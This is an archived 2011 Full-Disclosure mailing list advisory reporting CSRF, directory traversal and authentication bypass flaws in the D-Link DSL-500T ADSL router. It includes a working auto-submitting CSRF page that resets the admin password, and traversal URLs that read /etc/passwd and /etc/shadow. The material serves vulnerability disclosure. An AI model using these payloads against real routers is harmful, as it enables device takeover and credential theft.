| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 20 Dec 2011 01:28:21 +0200 From: "MustLive" <mustlive@...security.com.ua> To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk> Subject: CSRF, DT and AB vulnerabilities in D-Link DSL-500T ADSL Router Hello list! I want to warn you about new security vulnerabilities in D-Link DSL-500T ADSL Router. These are Cross-Site Request Forgery, Directory Traversal and Authentication Bypass vulnerabilities. This is my fifth advisory (#3 and #4 were announced and will be disclosed later, after giving the time for D-Link to fix those vulnerabilities) from series of advisories about vulnerabilities in D-Link products. ------------------------- Affected products: ------------------------- Vulnerable is the next model: D-Link DSL-500T, Firmware V1.00B02T02.RU.20050223. This model with other firmware versions is also vulnerable, and also other models of routers from D-Link can be vulnerable. ---------- Details: ---------- CSRF (WASC-09): All functionality of admin panel of the router has CSRF vulnerabilities. For example, the next CSRF-request allows to change login and password of administrator. D-Link DSL-500T CSRF.html <html> <head> <title>D-Link DSL-500T CSRF exploit (C) 2011 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://192.168.1.1/cgi-bin/webcm" method="post" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="getpage" value="../html/tools/usrmgmt.htm"> <input type="hidden" name="security:settings/username" value="admin"> <input type="hidden" name="security:settings/password" value="password"> <input type="hidden" name="security:settings/password_confirm" value="password"> <input type="hidden" name="security:settings/idle_timeout" value="30"> </form> </body> </html> All other functions in admin panel are also vulnerable to CSRF. And if to use XSS and DT, then it'll be possible to remotely read arbitrary files from the router. Directory Traversal (WASC-33): In 2006 in other models of D-Link's routers DT vulnerability was found (CVE-2006-2337). It also exists in this model, as I've checked (but as opposed to the description of DT in other models, in my model the authentication is required). http://192.168.1.1/cgi-bin/webcm?getpage=/etc/passwd http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow It's possible to read arbitrary files from the router. But this vulnerability works only after authentication. Authentication Bypass (WASC-01): In 2005 in other models of D-Link's routers AB vulnerability was found (CVE-2005-1680). It also exists in this model, as I've checked. It's possible to send commands to application firmwarecfg without authentication. Which allows e.g. to receive configuration file with login and password of administrator. For getting access to admin panel. ------------ Timeline: ------------ 2011.12.17 - disclosed at my site. I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/5581/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists